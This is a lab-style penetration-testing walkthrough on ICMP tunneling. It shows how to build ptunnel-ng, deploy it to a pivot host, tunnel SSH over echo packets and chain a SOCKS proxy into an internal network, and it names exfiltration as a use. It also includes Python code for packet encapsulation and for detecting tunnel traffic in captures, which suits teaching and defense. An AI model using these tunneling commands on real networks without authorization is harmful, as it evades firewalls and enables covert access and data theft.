ICMP tunneling encapsulates your traffic within ICMP packets, using the data field of echo requests and echo replies as the carrier.
ICMP tunneling only works when echo requests and replies are permitted through the firewall in question. Many firewalls that block outbound TCP and UDP still allow hosts to ping external addresses for troubleshooting, so a host inside such a network can wrap its traffic in the data field of echo requests and send them to a server it controls outside. That server unpacks the traffic, forwards it to the real destination, and returns the answer inside echo replies, which is extremely useful for data exfiltration and for creating pivot tunnels to an external server. Because ICMP guarantees neither delivery nor ordering, the tunnel has to carry its own sequence numbers, acknowledgements and retransmissions, and the resulting pings are larger and far more frequent than a normal ping; both properties are what defenders look for when hunting for ICMP tunnels.
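To make the encapsulation concrete, here is an added illustration in Python of what an ICMP tunnel puts on the wire. It is not ptunnel-ng's code and does not reproduce its framing (ptunnel-ng adds its own header, acknowledgements and retransmission on top of what is shown here): it builds echo request/reply packets whose data field carries application bytes, splits a byte stream across MTU-sized echo packets using the sequence field so the far end can reorder it, and verifies the RFC 1071 checksum when parsing. The SSH banners, the identifier 0x1234 and the function names are constructed for the example.

```python
"""What an ICMP tunnel puts on the wire, reduced to the essentials.

Added illustration for this section; it is not ptunnel-ng's code and does not
reproduce its framing (ptunnel-ng adds its own header, acknowledgements and
retransmission on top of what is shown here).
"""
import struct

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8
ICMP_HEADER_LEN = 8     # type(1) code(1) checksum(2) identifier(2) sequence(2)
IPV4_HEADER_LEN = 20    # without options


def icmp_checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of 16-bit big-endian words, complemented."""
    if len(data) % 2:
        data += b"\x00"                      # odd length is padded with a zero byte
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Echo request (8) or reply (0) whose data field carries `payload`."""
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        raise ValueError("only echo request/reply are built here")
    ident, seq = ident & 0xFFFF, seq & 0xFFFF
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes):
    """Return (type, ident, seq, payload); reject truncated, non-echo or corrupt packets."""
    if len(packet) < ICMP_HEADER_LEN:
        raise ValueError("truncated ICMP packet")
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:ICMP_HEADER_LEN])
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY) or code != 0:
        raise ValueError("not an echo request/reply")
    if icmp_checksum(packet) != 0:           # a packet plus its own checksum sums to zero
        raise ValueError("bad ICMP checksum")
    return icmp_type, ident, seq, packet[ICMP_HEADER_LEN:]


def is_valid_echo(packet: bytes) -> bool:
    try:
        parse_echo(packet)
        return True
    except ValueError:
        return False


def max_payload(mtu: int = 1500) -> int:
    """Application bytes per echo packet without IP fragmentation (1472 on Ethernet)."""
    return mtu - IPV4_HEADER_LEN - ICMP_HEADER_LEN


def encapsulate_stream(data: bytes, ident: int, mtu: int = 1500,
                       icmp_type: int = ICMP_ECHO_REQUEST) -> list:
    """Split a TCP byte stream over echo packets, numbering them in the sequence field.
    ICMP guarantees neither delivery nor order, so a real tunnel also acks and
    retransmits; the sequence number is the minimum needed to reassemble."""
    size = max_payload(mtu)
    chunks = [data[i:i + size] for i in range(0, len(data), size)]
    return [build_echo(icmp_type, ident, seq, chunk) for seq, chunk in enumerate(chunks)]


def reassemble_stream(packets, ident: int) -> bytes:
    """Rebuild the stream from echo packets in any order; the identifier field keeps
    one tunnel session apart from other pings on the same host."""
    pieces = {}
    for pkt in packets:
        _type, pkt_ident, seq, payload = parse_echo(pkt)
        if pkt_ident == ident:
            pieces[seq] = payload
    return b"".join(pieces[s] for s in sorted(pieces))


def banner_exchange() -> bytes:
    """One round trip as the tunnel sees it. The SSH banners are constructed samples."""
    client_hello = b"SSH-2.0-OpenSSH_9.6\r\n"
    server_hello = b"SSH-2.0-OpenSSH_8.9p1\r\n"
    request = build_echo(ICMP_ECHO_REQUEST, 0x1234, 1, client_hello)   # client -> proxy
    _t, ident, seq, carried = parse_echo(request)                       # proxy unpacks it,
    assert carried == client_hello                                      # hands it to TCP/22,
    reply = build_echo(ICMP_ECHO_REPLY, ident, seq, server_hello)       # and answers in a reply
    return parse_echo(reply)[3]                                         # client reads the banner
```

The identifier field is what lets the proxy tell one tunnel session apart from ordinary pings arriving at the same host, and the sequence field is the only ordering information ICMP offers; everything else a usable tunnel needs (acks, retransmits, multiplexing several TCP connections) has to be layered inside the data field, which is why the echo packets of a tunnel are consistently near the MTU rather than the 64 bytes of ping(1).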
We will use the ptunnel-ng tool to create a tunnel between our Ubuntu server (the pivot host) and our attack host. Once the tunnel is up, we will be able to proxy our traffic through the ptunnel-ng client running on the attack host. The ptunnel-ng server (the proxy end) runs on the target pivot host, so we first build the tool and copy it over.
Setting Up & Using ptunnel-ng
git clone https://github.com/utoni/ptunnel-ng.git

Building Ptunnel-ng with Autogen.sh

cd ptunnel-ng/
sudo ./autogen.sh

Alternative approach of building a static binary

A dynamically linked binary built on the attack host will refuse to start on the pivot if the target's GLIBC is older than the one it was linked against. Building a static binary removes that dependency. The sed command rewrites the last line of autogen.sh so that configure is run with --enable-static and LDFLAGS=-static before make:

sudo apt install automake autoconf -y
cd ptunnel-ng/
sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh
./autogen.sh

Transferring Ptunnel-ng to the Pivot Host

scp -r ptunnel-ng ubuntu@10.129.202.64:~/

Starting the ptunnel-ng Server on the Target Host

sudo ./ptunnel-ng -r10.129.202.64 -R22

The build leaves the binary in ptunnel-ng/src/, so run it from that directory. ptunnel-ng needs root on both ends because it sends and receives raw ICMP. Started without -p it runs as the proxy (server) and takes no listen address: it picks the tunnel's echo requests out of the ICMP traffic reaching the host, so the only requirement is that the attack host can ping 10.129.202.64. On the proxy, -r and -R restrict the destination that tunneled connections may be forwarded to. Here we pass the pivot's own IP and port 22, so clients of this proxy can only reach the SSH service on the pivot itself; a client asking for any other destination is not forwarded.
Back on the attack host, we connect to the ptunnel-ng server (-p <ipAddressofTarget>) and have the client listen on local port 2222 (-l2222). On the client, -r and -R name the destination the proxy should forward to, which must match what the proxy allows. Anything we send to local port 2222 is then carried through the ICMP tunnel and delivered by the proxy to 10.129.202.64:22.

Connecting to the ptunnel-ng Server from the Attack Host

sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

With the ptunnel-ng ICMP tunnel successfully established, we can attempt to connect to the target using SSH through local port 2222.
Tunneling an SSH connection through an ICMP Tunnel

ssh -p2222 -lubuntu 127.0.0.1

Viewing Tunnel Traffic Statistics
On the client & server side of the connection, we will notice ptunnel-ng gives us session logs and traffic statistics associated with the traffic that passes through the ICMP tunnel. This is one way we can confirm that our traffic is passing from client to server utilizing ICMP.
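ptunnel-ng's own counters are one confirmation; a packet capture is the independent one, and it is also what a defender would be looking at. The following is an added example in Python, not part of the page or of ptunnel-ng: it reads the text that tcpdump prints (the constructed sample below follows the format of `sudo tcpdump -ni <iface> 'icmp or tcp port 22'`, where the interface name is an assumption), totals echo requests and replies per client/proxy pair, reports any TCP sent straight to port 22 (traffic that bypassed the tunnel), and flags pairs whose pings look like a tunnel rather than ping(1). The thresholds, a 64-byte normal ping and more than 5 echo requests per second, are heuristics chosen for this example.

```python
"""Confirm from a packet capture that the SSH session is riding ICMP.

Added example for this section; it is not ptunnel-ng output or code. The capture
text is constructed to match tcpdump -n's line format, not taken from a real run.
"""
import re
from collections import defaultdict

# Constructed sample capture: three tunnel round trips, then one ordinary ping.
SAMPLE_CAPTURE = """\
12:00:01.000100 IP 10.10.14.5 > 10.129.202.64: ICMP echo request, id 4660, seq 1, length 1032
12:00:01.000300 IP 10.129.202.64 > 10.10.14.5: ICMP echo reply, id 4660, seq 1, length 1032
12:00:01.010100 IP 10.10.14.5 > 10.129.202.64: ICMP echo request, id 4660, seq 2, length 1032
12:00:01.010300 IP 10.129.202.64 > 10.10.14.5: ICMP echo reply, id 4660, seq 2, length 1032
12:00:01.020100 IP 10.10.14.5 > 10.129.202.64: ICMP echo request, id 4660, seq 3, length 1032
12:00:01.020300 IP 10.129.202.64 > 10.10.14.5: ICMP echo reply, id 4660, seq 3, length 72
12:00:02.000000 IP 10.10.14.5 > 10.10.14.1: ICMP echo request, id 77, seq 1, length 64
12:00:02.000200 IP 10.10.14.1 > 10.10.14.5: ICMP echo reply, id 77, seq 1, length 64
"""

IPV4 = r"\d+\.\d+\.\d+\.\d+"
LINE = re.compile(
    rf"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>{IPV4})(?:\.(?P<sport>\d+))? > "
    rf"(?P<dst>{IPV4})(?:\.(?P<dport>\d+))?: (?P<body>.*)$"
)
ECHO = re.compile(r"ICMP echo (?P<kind>request|reply), id (?P<id>\d+), seq (?P<seq>\d+), length (?P<len>\d+)")


def _seconds(ts: str) -> float:
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_line(line: str):
    """One tcpdump line -> dict, or None for lines in another format."""
    m = LINE.match(line.strip())
    if not m:
        return None
    rec = {"ts": _seconds(m["ts"]), "src": m["src"], "dst": m["dst"],
           "dport": int(m["dport"]) if m["dport"] else None, "proto": "other"}
    echo = ECHO.search(m["body"])
    if echo:
        rec.update(proto="icmp", kind=echo["kind"], length=int(echo["len"]))
    elif m["body"].startswith("Flags ["):
        rec["proto"] = "tcp"
    return rec


def summarize(capture: str, ssh_port: int = 22, ping_len: int = 64, max_req_per_sec: float = 5.0):
    """Per client>proxy ICMP totals, direct TCP-to-SSH sightings, and tunnel findings."""
    flows = defaultdict(lambda: {"request": 0, "reply": 0, "bytes": 0, "max_len": 0,
                                 "first_req": None, "last_req": None})
    direct_tcp = []
    for line in capture.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["proto"] == "icmp":
            # Key every packet by client>proxy: a reply travels proxy -> client.
            key = f"{rec['src']}>{rec['dst']}" if rec["kind"] == "request" else f"{rec['dst']}>{rec['src']}"
            f = flows[key]
            f[rec["kind"]] += 1
            f["bytes"] += rec["length"]
            f["max_len"] = max(f["max_len"], rec["length"])
            if rec["kind"] == "request":
                f["first_req"] = rec["ts"] if f["first_req"] is None else f["first_req"]
                f["last_req"] = rec["ts"]
        elif rec["proto"] == "tcp" and rec["dport"] == ssh_port:
            direct_tcp.append((rec["src"], rec["dst"]))   # SSH that did not use the tunnel

    findings = []
    for key, f in flows.items():
        reasons = []
        if f["max_len"] > ping_len:
            reasons.append(f"echo payload {f['max_len']} bytes, ping default is {ping_len}")
        span = (f["last_req"] - f["first_req"]) if f["request"] > 1 else 0.0
        if span > 0 and f["request"] / span > max_req_per_sec:
            reasons.append(f"{f['request'] / span:.0f} echo requests/s")
        if reasons:
            findings.append({"flow": key, "reasons": reasons})
    return {"flows": dict(flows), "direct_tcp_to_ssh": direct_tcp, "findings": findings}


if __name__ == "__main__":
    import json, sys
    # `python3 icmp_check.py - < capture.txt` reads a real capture; no argument uses the sample.
    text = sys.stdin.read() if len(sys.argv) > 1 and sys.argv[1] == "-" else SAMPLE_CAPTURE
    print(json.dumps(summarize(text), indent=2))
```

On the sample, the 10.10.14.5>10.129.202.64 pair is reported with 1032-byte echo payloads at about 150 requests per second while the ordinary ping to 10.10.14.1 is not, and the direct-TCP list is empty, which is the result you want to see from the attack host. Run the same script on the pivot's own capture to see what the tunnel looks like to anyone monitoring that segment.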
Enabling Dynamic Port Forwarding over SSH

Since the SSH session itself now runs over the ICMP tunnel, a dynamic port forward on top of it gives us a SOCKS proxy into whatever internal network the pivot can reach:

ssh -D 9050 -p2222 -lubuntu 127.0.0.1

Proxychaining through the ICMP Tunnel

With proxychains pointed at the SOCKS proxy on 127.0.0.1:9050 (its default configuration), tools on the attack host can be pushed through the tunnel. Proxychains only relays TCP connections, so use full connect scans (-sT); nmap's ICMP and ARP host discovery does not go through the proxy, so add -Pn if the target shows as down.

proxychains nmap -sV -sT 172.16.5.19 -p3389

Note: Consider the version of GLIBC on the target and make sure the ptunnel-ng binary you transfer is on par with it. A binary compiled on the attack host against a newer GLIBC will not start on the pivot; either build against a matching GLIBC or use the static build described above.